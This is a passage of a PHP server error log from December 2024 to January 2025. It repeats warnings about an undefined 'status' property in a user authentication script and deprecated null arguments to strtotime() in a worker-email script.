/home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:54:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:56:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:58:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [17-Dec-2024 23:58:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 02:05:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 11:19:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [18-Dec-2024 12:52:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 00:03:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 00:04:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 00:04:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 01:39:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 01:39:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 01:39:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 02:29:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 02:45:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 03:03:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 03:17:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:10:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:15:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:39:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:54:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 04:56:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:16:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:48:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:49:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 05:55:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 07:14:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 07:30:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 09:32:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 09:57:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 10:29:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 11:57:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 12:05:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 14:40:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 23:54:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [19-Dec-2024 23:55:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [19-Dec-2024 23:55:11 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 00:11:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:25:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:25:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 01:53:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:03:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:14:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 02:16:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:17:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:18:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [20-Dec-2024 02:51:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 06:50:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [20-Dec-2024 10:18:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Dec-2024 00:54:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [21-Dec-2024 00:56:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 04:13:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 04:15:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:49:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 05:50:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:50:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:51:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:52:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 05:53:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 08:20:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:17:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:19:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:20:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:25:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 09:27:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:27:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:28:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:31:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:34:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:34:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 09:35:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [22-Dec-2024 19:24:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 22:44:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:00:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:06:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [22-Dec-2024 23:09:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:11:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:12:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:22:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:24:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:24:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 00:31:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 00:34:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 02:52:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:12:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:19:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:23:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:28:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:31:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:31:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:33:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:34:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:35:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:37:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:37:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:37:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 03:47:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:47:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:50:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:50:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:51:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:54:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:55:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:55:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 03:56:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 04:19:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 04:19:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 04:46:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:23:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:27:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:55:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 05:59:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:10:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 06:11:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 06:12:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 06:45:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 07:09:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:30:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:34:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 07:39:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 08:30:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 10:50:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 10:51:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Dec-2024 11:00:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Dec-2024 22:13:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Dec-2024 23:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Dec-2024 05:37:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Dec-2024 05:51:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:51:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:51:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 05:52:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Dec-2024 06:12:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:39:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [30-Dec-2024 00:54:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:54:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [30-Dec-2024 00:57:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [01-Jan-2025 08:12:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [01-Jan-2025 16:21:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 01:45:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 01:47:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [02-Jan-2025 06:49:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [02-Jan-2025 06:51:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [02-Jan-2025 10:02:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 02:05:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 05:11:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [03-Jan-2025 05:12:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:13:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:13:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:14:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:14:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:15:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:16:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 05:18:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [03-Jan-2025 12:59:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 07:08:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [04-Jan-2025 07:12:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:12:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:12:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:13:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:14:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:15:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:16:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:17:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [04-Jan-2025 07:18:47 